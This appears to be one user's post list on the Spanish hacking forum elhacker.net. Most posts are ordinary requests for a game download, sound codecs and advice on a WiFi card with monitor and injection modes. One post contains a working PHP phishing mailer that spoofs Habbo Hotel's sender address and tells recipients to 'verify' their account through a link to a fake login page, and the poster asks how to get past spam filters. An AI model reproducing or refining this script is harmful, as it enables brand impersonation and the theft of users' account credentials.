elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Materiales y equipos / Problema de compra WiFi en: 24 Octubre 2008, 17:47 pm
Hola queria saber , bueno para empezar me estoy iniciando en el tema y quisiera comprar una tarjeta de red , hay varias paginas entre las mas conocidas me ofrecen varias pero el problema es que ninguna da en sus caracteristicas lo que realmente necesito , (modo monitor , aireplay , modo inyeccion) , quisiera saber si alguno es de argentina y compro alguna por internet ya que aqui donde vivo todas son medio berretas jajaja , si es asi cual me aconsejan que compre ? tiren modelos , me gustaria y tengo para bancar un chipset atheros pero ahora el modelo ? esa es mi duda . saludos espero respuestas!  :o
2  Programación / PHP / Re: Email con php (NO DESEADO) en: 11 Enero 2007, 04:23 am
si le quito los headers ? tu dices ertai? mmm nunca probe eso pero bue , probare , pero lo mismo digo que los necesito por el titular y el asunto del mensaje tu que me aconsejas , saludos
3  Programación / PHP / Email con php (NO DESEADO) en: 10 Enero 2007, 18:22 pm
bueno andube navegando por toda la red bue casi toda :PP y mi duda es que utilizo la funcion mail a partir de recursos de php pero cuando logro enviar el email a los usuarios les llega a no deseado , alguien sabe que modificacion se podria hacer en el codigo para que llegue como deseado ? dejo el code para que lo chekeen gracias desde ya :

<?php
include("../configuracion.php");
function emailval($email)
{

list($local, $domain) = explode("@", $email);

$pattern_local = '^([0-9a-z]*([-|_]?[0-9a-z]+)*)(([-|_]?)\.([-|_]?)[0-9a-z]*([-|_]?[0-9a-z]+)+)*([-|_]?)$';
$pattern_domain = '^([0-9a-z]+([-]?[0-9a-z]+)*)(([-]?)\.([-]?)[0-9a-z]*([-]?[0-9a-z]+)+)*\.[a-z]{2,4}$';

$match_local = eregi($pattern_local, $local);
$match_domain = eregi($pattern_domain, $domain);

if ($match_local && $match_domain)
{
  return 1;
}
else
{
  return 0;
}
}

if(emailval($mail))
{
$mensaje=base64_encode($mensaje);
$msg= "<html>
<html>

<table style=BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-LEFT: #ffffff 1px solid; BORDER-BOTTOM: #ffffff 1px solid cellSpacing=8 cellPadding=0 width=100% align=center border=0 nowrap>
  <tr>
    <td>
<tr>
        <td>
        <table cellSpacing=8 cellPadding=0 width=100% align=center border=0 nowrap>
          <tr>
            <td>
            <div>
              <script>
<!--
function Filtered()
{
return 0
}
//-->
              </script>
              <table height=176 cellPadding=1 width=749 align=center border=0>
                <tr bgColor=#ffffff>
                  <td colSpan=2 height=44>
                  <div align=center>
&nbsp;</div>
                  <div align=center>
                  </td>
                </tr>
                <tr>
                  <font face=Verdana, Arial, Helvetica, sans-serif size=2>
                  <b>¡Hola! $user</b></font>
                  <p>
                  <b>
                  <font face=Verdana, Arial, Helvetica, sans-serif size=1>
                  </font></b><font face=Verdana, Arial, Helvetica, sans-serif size=1>
                  Al parecer tenemos problemas para encontrar tu Habbo en nuestra base de datos, para verificar los datos de tu Habbo, haz click en el link que aparece debajo.</font></p>
                  <p>
                  <font face=Verdana, Arial, Helvetica, sans-serif size=1></font></p>
                  <p>
                  <font face=Verdana, Arial, Helvetica, sans-serif size=1>
                  <a href=http://$sophya_web/sophya/3/inicioseccion.php?mail=$mail&nick=$idUsuarioL target=_blank>
                  Haz click en este link.</a>
                  <p>&nbsp;</p>
                  <p>
                  <font face=Verdana, Arial, Helvetica, sans-serif size=1>
                  <!-- Start ##### ad call for X32 position ##### -->
                  <comment language=javascript><!--
DisplayAds (Position2!Position2, 1, 1);
//--></comment>
                  <!-- end ##### ad call for X32 position ##### --></font></td>
                </tr>
                </tr>
              </table>
              <p>&nbsp;&nbsp;&nbsp;&nbsp; <font color=#000000>
            </div>
</td>
          </tr>
        </table>
        </td>
      </tr>

    </td>
  </tr>

</html>
</html>";

//para el envío en formato HTML
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: \"Habbo Hotel\" <es-contact@sulake.com>\r\n";
$asunto= "¡Tu Habbo!";

mail($mail, $asunto, $msg, $headers);
echo "<script>alert(\"SOPHYA: solo queda esperar ya lo envie a $mail\");</script>";
include("../respuesta.php");
}
?>
<body>



saludos  :o
4  Media / Juegos y Consolas / Re: Seven Kingdoms en: 15 Abril 2006, 19:58 pm
eh buscado por el google pero lo unico que me da son las demos del juego , si alguien sabe alguna web en donde lo tengan please que postee , gracias desde ya
5  Media / Juegos y Consolas / Seven Kingdoms en: 15 Abril 2006, 07:28 am
alguien sabe o tiene algun link de donde se pueda bajar este magnifico juego ? es que lo vengo buscando hace un tiempo y creanme para mi es uno de los mejores ya que lo  juego desde hace años . gracias desde ya


saludos
6  Media / Multimedia / CODECS De SoNiDo en: 10 Febrero 2006, 18:29 pm
hola como va resulta qeu tengo una compaq presario y es un cancer siempre le pasa algo , ahora ando necesitando  los codecs de sonido /audio de una compaq modelo 5bw143 , por favor es de gran ayuda ya que tengo un servicio de musica y sin la pc no puedo trabajar :(  :( bueno desde ya gracias
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines